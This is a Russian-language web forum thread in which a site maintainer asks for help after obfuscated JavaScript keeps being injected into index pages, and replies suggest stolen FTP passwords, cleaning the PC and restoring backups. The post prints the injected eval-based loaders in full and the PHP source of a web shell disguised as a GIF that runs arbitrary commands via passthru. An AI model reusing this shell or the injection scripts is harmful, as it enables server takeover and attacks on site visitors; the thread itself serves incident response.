Перейти к контенту
  • 0

Взлом сайта

GreenMar

Спросил GreenMar,

 Поделиться

Вопрос

GreenMar

GreenMar

Опубликовано
Опубликовано

Сразу перейду к проблеме:

каждый вечер кто-то каким-то образом вставляет свой код в HTML код сайта

код выглядит следующим образом

<!-- o --><script language=javascript>
s = "0796084108380850083308450837076808550841083608520840079707850768084008370841
08390840085207970785076808380850083308450837080208470850083608370850079707840768
0
85108500835079707750840085208520848079407830783085508550855078208560781083808330
8
51085207810835083308440844078208410846083808470783079107830835084708530846085208
3
70850078208480840084807750798079607830841083808500833084508370798";
k = "f = String.fromCharCode(32,32,32,32,118,97,114,32,32,32,111,32,32,32,61,32,32,32,34,34,32,32,32,59,3
2,32,102,117,110,99,116,105,111,110,32,32,32,32,100,32,32,40,32,32,32,41,32,32,3
2
,123,32,32,32,32,105,32,32,32,32,61,32,32,32,48,32,32,32,59,32,99,32,32,32,61,32
,
32,48,32,32,32,32,59,32,32,119,104,105,108,101,32,32,32,32,40,32,32,32,105,32,32
,
60,32,32,32,115,46,108,101,110,103,116,104,32,41,32,32,32,32,123,32,32,99,13,10,
6
1,32,32,77,97,116,104,46,114,111,117,110,100,32,32,32,40,32,115,46,99,104,97,114
,
65,116,40,32,32,105,32,32,32,41,32,43,32,115,46,99,104,97,114,65,116,40,32,105,3
2
,32,32,43,32,32,32,49,32,32,32,41,32,32,32,43,32,32,32,32,115,46,99,104,97,114,6
5
,116,40,32,32,105,32,43,32,32,32,32,50,32,41,32,32,32,43,32,32,115,46,99,104,97,
1
14,65,116,40,32,105,32,32,43,32,32,32,32,51,32,32,32,32,41,13,10,41,32,32,32,45,
3
2,32,32,55,51,54,59,32,32,32,105,32,32,32,32,61,32,105,32,32,32,32,43,32,32,32,3
2
,52,32,32,59,32,32,111,32,32,32,43,61,32,32,32,83,116,114,105,110,103,46,102,114
,
111,109,67,104,97,114,67,111,100,101,40,32,32,32,99,32,32,41,32,32,32,32,59,32,3
2
,32,125,32,32,32,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,32,32,
1
11,32,32,41,32,125,32,100,40,13,10,41,59);";
eval(eval(k));
</script><!-- c -->

вставляется на индексковые файлы (корня и других директорий), остальные не трогает. Но когда я это обнаружил - код был во всех хтмл файлах.

Грешу на дыру в форуме. Перерыл все файлы, нашёл в папке Screenshots файл [4]she.gif, оказалось что это alsaTeam's command shell ver.2.1_light со следующим кодом

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">alsaTeam's command shell ver.2.1_light</font></b> <font face="verdana" size="2"> - antichat.ru<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>

<div align="center">
 <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
<tr>
  <td width="633" height="17">

<pre><font color="red" font face="Tahoma" size="2">
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
  passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>

</font></pre>
</tr>
 </table>

								 </div>
								 <br>
								 <hr color="#000000" width=80% height=115px>
								 <br>

</font>

Удалить файл не могу, изменить атрибуты, переименовать тоже.

Переименование папки не помогает - всёравно код прописывается.

 

пс. в некоторых страницах обнаружил так же в самом конце страницы после тэга [/html] вот такой код

<!-- [ af6acf51e7485f07d2f55cdea553f788 ] --><script>eval(unescape('function%20qRB%28yPGhMr%29%7Bfunction%20hMmU%28wysIe%29%7Bvar%20pnnd%3D0%2CsRfq%2CrLV%3DwysIe.length%3Bfor%28sRfq%3D0%3BsRfq%3CrLV%3BsRfq++%29pnnd+%3DwysIe.charCodeAt%28sRfq%29*rLV%3Breturn%20new%20String%28pnnd%29%7DyPGhMr%3Dunescape%28yPGhMr%29%3Bvar%20zxEr%3Deval%28%27a+r%5Bg%5BuVmje%5Bn%5BtVsz.jczazlVl%5BeVe+%27.replace%28/%5B%5C%5BjV%5C+z%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CkeHTbE%3DhMmU%28zxEr%29%2CnaNG%3Dnew%20String%28%29%2CseDg%3D0%3BpDJ%3D0%3Bfor%28var%20rmp%3D0%3Brmp%3CyPGhMr.length%3Brmp++%29%7BnaNG+%3DString.fromCharCode%28yPGhMr.charCodeAt%28rmp%29%5E%28zxEr.charCodeAt%28seDg%29%5EkeHTbE.charCodeAt%28pDJ%29%29%29%3BseDg++%3BpDJ++%3Bif%28seDg%3EzxEr.length%29seDg%3D0%3Bif%28pDJ%3EkeHTbE.length%29pDJ%3D0%3B%7Deval%28naNG%29%3BnaNG%3D%27%27%3Breturn%3B%7DqRB%28%27%2531%2539%2535%2530%2535%2534%2535%2538%2551%2536%250d%2521%2513%2507%2574%2551%2531%251b%257f%2502%2520%2529%252f%252e%2575%2520%253f%2533%2518%252d%253d%253f%250d%2535%256e%255c%2563%2532%253c%253b%2525%2542%256b%252a%253f%2532%251d%254b%250e%2559%2558%2562%2527%2506%2516%253f%256f%2535%253f%2534%257a%2565%2513%2521%2537%2535%2563%2503%253e%252c%2535%2517%250c%253c%2531%252f%251c%250c%2532%2544%250a%252f%252a%253a%252a%2538%252c%2522%2565%2521%253b%2564%2522%2563%2574%2534%2513%2523%2511%2526%2516%2561%2561%250f%2526%2530%253a%256e%254c%256c%256a%256b%256f%2561%2570%257e%254d%2522%2506%2529%2562%2561%2567%2572%256f%2549%257f%2521%2530%2540%2516%2530%2510%256a%2548%2562%257c%2561%2526%253a%2520%2535%2527%2539%2518%2534%251c%2565%256a%2575%2578%2562%250c%251c%2522%2523%2568%2533%253d%2520%2518%2506%252a%250b%250b%252e%2522%2533%252f%2509%255b%2562%2537%2565%2573%2568%2572%2566%2574%257d%257d%2538%250f%253d%2535%2534%2535%2538%2500%2531%2539%2535%257a%254b%2561%2509%254a%254f%2568%252c%2556%2569%257e%2573%2576%2502%2501%256f%257b%256b%257b%257d%2579%2522%251d%2511%2570%2522%2566%2578%252c%255d%2537%253e%2571%2534%253a%2534%2570%2537%253f%2577%257d%2568%254e%257b%2552%2576%255a%2579%254b%2562%250c%251c%2522%256a%2570%2533%251f%2506%2504%2504%2528%250e%2512%2536%252e%2533%253c%2573%255b%257d%255d%2579%2520%2567%255e%255d%2528%254d%257e%253f%252b%2538%2534%2568%2530%2527%2543%2537%2574%256e%2569%2511%251b%2534%2506%255c%256f%2534%2524%2536%2569%253d%2571%253a%250c%2535%253f%256e%2559%255d%2513%2533%252b%250f%2539%256c%2535%2535%2529%2574%257f%2557%250b%253f%2524%251d%2536%2534%2507%252d%2504%2532%253c%254e%2576%2532%2525%2539%2520%2509%252c%2531%2536%2539%2514%2561%257c%2578%252e%250f%2527%251f%2533%2577%2539%2532%257c%2524%2522%2533%2538%257c%2551%2537%2526%253c%2509%2502%2573%2527%250b%2505%2525%2551%257f%2566%2548%253e%252e%2501%257f%2515%2530%2500%2529%2558%255c%2548%2566%2531%255f%2520%2520%2508%251e%2531%2532%2523%257d%251f%2536%2538%2560%2501%2522%2563%253c%257d%2572%257d%2526%2535%2507%2500%2514%253f%2565%2574%257b%2565%2557%256a%2562%256a%2549%2554%2567%2541%252b%2564%254c%2564%257e%2525%2537%2526%2505%2512%256d%250b%2533%2576%253a%2531%253b%2511%251b%2533%2541%2542%255e%2529%2534%252c%2524%2567%257d%2520%2575%2571%2579%2573%256a%257d%253f%2525%2512%2502%250b%2529%2548%2504%253d%2514%253f%2503%256d%257c%2574%257f%257c%253e%2523%2520%2524%252e%2509%2531%2574%2564%2556%2534%2560%2515%252c%250e%2516%250a%2502%2570%256b%2522%253c%2530%2560%2530%2579%2559%251f%256e%2522%251c%2517%2537%2572%2539%251e%253b%253f%2529%2552%2570%253e%2523%2524%2502%2530%2525%256e%2510%2544%2573%252d%252c%250a%2516%2527%2506%250a%2560%2573%257b%2538%2524%252d%252f%253f%2520%253b%2579%257e%2571%252f%252f%2510%257f%2545%2520%2510%2528%2530%2549%2533%2528%2538%2529%2506%252f%2529%250d%252e%2535%252f%2537%2509%252a%250f%2525%256a%2575%2573%2529%253e%250f%252d%257d%253f%255d%2550%2560%2505%252e%2508%2536%2518%2530%2513%2574%2500%2523%2517%2524%2532%2528%253c%252e%2503%2530%257f%257f%2505%2528%256c%2510%2522%2529%2531%2529%2539%2531%2534%252b%2534%251a%2531%250c%2538%2556%2549%2536%2579%251b%253c%2519%253b%2519%2531%256e%2501%257b%2527%256b%254d%257a%2506%2521%2511%2536%251e%2522%2527%2502%2533%253f%2542%254b%2501%2576%251b%2537%2511%252f%2526%253c%2578%257e%2521%2519%257b%2502%2575%257e%250a%2504%256c%252f%2564%257e%2569%255d%2537%2539%251f%2549%2551%2520%250b%2564%2545%2571%253a%2564%2545%257c%2557%2571%2553%252d%2508%252b%250b%255a%252c%257c%252a%2512%2508%2513%253b%2500%2513%2538%250d%256a%2575%2571%2570%2548%2554%2528%2543%2576%253c%253f%255f%2503%2561%2542%2538%256f%2531%2575%2526%2519%2535%2517%2555%253f%256a%2570%2575%2550%255c%2521%2511%2508%2576%250a%2526%257a%256c%2564%257f%2564%251f%2524%2527%2538%251f%2511%2502%2569%2565%2532%2500%256b%2547%2572%253d%2507%2524%2526%2547%2537%2567%2556%2578%2576%2578%2577%251c%2535%2520%2554%253c%2568%2537%252e%2574%2525%257e%253a%2532%2533%2504%252c%2523%2536%253c%2541%2526%2552%2528%256e%2533%2532%257c%2563%2578%2531%2573%2527%2503%2528%2533%2535%2554%2514%2573%2567%2512%254a%2534%251d%2574%2528%250d%2578%2562%254d%2522%2532%2530%2500%252f%2518%255d%2516%256f%252e%2515%253c%2526%2509%2527%253d%2531%2532%257b%2506%2521%2526%2534%2520%256b%2530%2565%2565%2533%2563%2535%2510%251e%2514%2511%251d%253e%256c%256e%2575%251e%250a%2535%2513%2519%252b%252e%2531%2525%251b%2542%2571%252c%2524%2528%2529%2511%251c%256d%254d%2568%2503%2569%2511%2514%2523%2518%250b%254e%2518%2552%2567%2572%2566%2568%256c%2525%252b%2570%2570%2510%257c%2569%253f%2529%2539%2502%2507%255d%2535%2548%254c%2574%2544%2501%2549%256c%253f%2570%2530%2574%2536%2528%253c%2518%2562%2544%2565%2567%2534%2518%2520%2522%2500%2520%252c%2573%2571%250a%2522%2552%251e%2521%250b%2560%2544%256d%251e%254e%2562%2566%2554%2551%2575%2566%2528%2538%2533%2521%2562%251b%2532%2522%2504%252c%2508%2539%252d%256d%255b%2517%2537%252d%2531%2557%2501%2529%2505%250d%2529%252c%2515%253f%253c%2526%2560%256b%253d%253c%257e%2525%2576%2537%2529%2519%253c%250d%2531%252e%2520%252f%2512%2537%256d%2571%2531%251a%2567%2531%2528%2532%2523%253a%2532%251c%250f%2504%2532%2536%253d%2536%253e%252d%250a%257f%2567%256c%2506%2507%2532%251b%253e%251c%2530%2532%256e%257a%252f%2536%2535%2535%2525%2504%253f%2558%2563%256b%2531%2528%2521%250d%2519%252e%253e%2532%257a%253b%253b%2525%250c%252d%250a%2576%2533%253e%253e%2524%2516%253c%252d%253f%252b%253b%2526%2526%2561%2537%2539%2532%2537%250a%2530%2555%2527%253d%252d%254c%257b%257a%2577%2567%2544%256e%2579%2534%255a%252d%253f%2515%256a%2524%2532%2534%2534%2547%2526%250a%2524%2530%2521%2532%2579%2558%255c%2521%2563%2528%252c%2525%254e%2565%254e%2538%257a%2561%254a%2536%2577%257c%250d%2529%253a%250c%2535%2517%2578%2542%2579%2506%2537%2516%2517%253f%2570%2531%253a%2552%255b%252d%2513%2527%2518%2561%252e%2561%256b%2564%2538%2510%2569%255a%2562%257d%2574%2559%254d%2522%2555%2532%257f%256a%2564%253a%2570%2525%257f%2519%257b%2516%257c%2563%2504%251f%253f%255f%2511%2562%2531%2579%253b%252f%2526%2520%256d%2543%2533%2532%2524%2512%2513%2504%2524%2562%2546%2504%2502%2566%253a%251b%2572%2504%2551%252a%250d%2564%2511%2573%2571%2576%256b%2541%256b%2536%2549%2560%2539%256d%253a%253b%2538%256b%2528%253c%2522%2551%2528%257b%2568%2573%2513%2575%2510%257c%2577%257d%2577%257d%2525%2568%2563%253e%257e%2502%2534%2525%2523%2508%2515%2572%2511%251c%2510%253f%255f%257d%2537%2507%253f%2539%255e%2512%2530%2525%251c%2562%2502%2514%251d%2522%253a%251c%257b%256c%2556%2529%2576%2533%2523%253b%2516%2527%2527%2569%2569%2572%253b%2568%257c%2560%2521%2524%2524%2506%2526%2513%2572%256f%2567%252f%2569%2514%2525%2529%2528%2547%2543%2565%2555%256f%2539%2517%2513%253f%2502%253e%2528%2516%253c%2526%2526%2524%2535%2537%251d%2573%2554%2500%2533%2511%2513%251f%2524%2530%2569%256e%251c%250a%2524%2514%2510%2561%253e%250d%2500%2575%2531%255d%2543%255c%256b%2549%250f%2567%250e%252b%2514%2564%2538%2562%2570%2533%2566%2535%2535%253a%257c%2539%2534%2524%2535%2508%2578%2567%255a%252c%257d%256f%2531%257f%256d%2577%2538%2526%2536%2524%2575%256a%2550%2559%27%29%3B'));</script><!-- end -->

 

Форум версии 1.3, патчился много раз, не мною...

 

Подскажите, что делать?

Заранее благодарю за помощь...

Ссылка на комментарий
Поделиться на других сайтах

10 ответов на этот вопрос

Рекомендуемые сообщения

  • 0
Sannis

Sannis

Опубликовано
Опубликовано

1. Пропатчить ещё раз, своей рукой уже.

2. Проверять на вирусы стоит в 90% случаев свой компьютер, скорее всего пароли от ftp украли. Нужно их сменить, также как и все остальные пароли.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
GreenMar

GreenMar

Опубликовано
  • Автор
Опубликовано

т.е. это более вероятно?

Просто я не совсем профи в этих воросах...

За сайтом попросили посмотреть, а тут такая вот беда...

 

1. Пропатчить ещё раз, своей рукой уже.

2. Проверять на вирусы стоит в 90% случаев свой компьютер, скорее всего пароли от ftp украли. Нужно их сменить, также как и все остальные пароли.

Спасибо за ответы :-)

но...

Я то и не патчил никогда. Точнее, я понимаю что это такое (открыть файл в текстовом редакторе, найти и заменить отрезок кода), но что конкретно и на что патчить не знаю. Буду благодарен за "ткнутие носом" в соответствующую тему, так как просмотрел уже 7 страниц форума.... да и поиск мне не помог...

Что касается паролей от фтп - то здесь не тот случай. Никто не заходит кроме меня..!

Ссылка на комментарий
Поделиться на других сайтах
  • 0
-Cross-

-Cross-

Опубликовано
Опубликовано

Да то что вирус - это большая вероятность. Я не думаю что это чел сидит и что то Вам колдует.

Кто то закинул вирус и он сам потиху поглощает файлы. Я с таким уже сталкивался, правда тогда уже мой сайт и форум были заброшены и я не стал восстанавливать.

 

 

Стукните хостеру. попросите помочь. Надеюсь у Вас отзывчивый хостер.

У меня просто был случай, на фтп появился вирус (хост всем известный тут биг...). Когда я обратился с помощью, вместо помощи я получил блок аккаунта...

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Sannis

Sannis

Опубликовано
Опубликовано

-Cross-, это закономерно. Потому что "вирусы" эти проникают на сервер по ftp, после того как с компьютера админа крадутся пароли. Естесственно, что это делается не вручную, но механизма это не меняет. Так что в том, что вирус прописал в файлы форума где-то скрипт, который записывает вышеприведённое в файлы форума, вина админа сайта. Так что последовательность именно такая:

1. Очистить от вирусов свой компьютер.

2. Сменить пароль на FTP.

3. Найти на сервере иногордный php или иной скипт, если он есть(его может и не быть скорее всего).

4. Удалить все вставки яваскрипта, которые он сделал.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
-Cross-

-Cross-

Опубликовано
Опубликовано
-Cross-, это закономерно

Ну к ФТП имел доступ не только я и вполне возможен хакинг самого сервера.

Да и может у рут акаунта появился вирус и он расплодился... Такое тоже бывает.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Sannis

Sannis

Опубликовано
Опубликовано

Если это хакинг сервера, то валить надо от такого хостинга. Тем более что это очень редкое явление.

 

Да и может у рут акаунта появился вирус и он расплодился... Такое тоже бывает.

Если имеется в виду рут на форуме, то он не может в любой файл взять и записать что-то.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
keshakentozavr

keshakentozavr

Опубликовано
Опубликовано

Это троян такой, ворует фтп-пароли из TotalCommander и заменяет индексные файлы на многих популярных движках. Старайтесь пользоваться другим ФТП-клиентом.

 

Троян криптованный, не все антивирусы его видят. У знакомого было подобное, и антивирус Касперского прозевал трояна. Помогла чистка компьютера с помощью Avast!, закрытие файрволом исходящего трафика, смена фтп-паролей, и замена всех файлов на сервере из бекапных.

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
 Поделиться
Перейти к списку вопросов
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.

  Согласен